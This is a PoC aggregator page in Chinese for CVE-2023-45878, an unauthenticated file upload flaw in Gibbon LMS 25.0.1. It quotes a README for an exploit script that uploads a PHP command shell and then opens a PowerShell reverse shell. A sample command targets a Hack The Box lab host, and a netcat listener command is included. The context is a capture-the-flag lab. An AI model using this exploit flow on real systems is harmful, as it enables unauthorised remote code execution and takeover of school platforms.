POC详情: 28639c2b0241bff1b5434af3948a130cf92cdd46

来源
关联漏洞
标题: Gibbon 安全漏洞 (CVE-2023-45878)
描述:Gibbon是一个解决教育工作者每天遇到的实际问题的学校平台。 GibbonEdu Gibbon 25.0.1版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者将任意文件上传到应用程序,并在底层系统上执行代码。
介绍
# CVE-2023-45878

Wrote this script based on the work of https://herolab.usd.de/security-advisories/usd-2023-0025/ . The exploit works by using an Arbitrary File Write exploit in Gibbon LMS 25.0.1 . This PoC will use upload a simple php cmd script, and then use that to load a powershell revshell.

```Example
python3 CVE-2023-45878.py -u http://frizzdc.frizz.htb/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf
```

Flags:
```
-u, URL where Gibbon LMS is installed.
-l, your IP
-p, your open port
-f, filename. Important if you need to manually test. Default is "asdf".
```

Have a listener ready for the incoming shell.

```
nc -lvnp 8888
```

This was used for TheFrizz on HTB, submitted by 0xPizzaCat.
文件快照

[4.0K] /data/pocs/28639c2b0241bff1b5434af3948a130cf92cdd46 ├── [5.1K] CVE-2023-45878.py └── [ 699] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。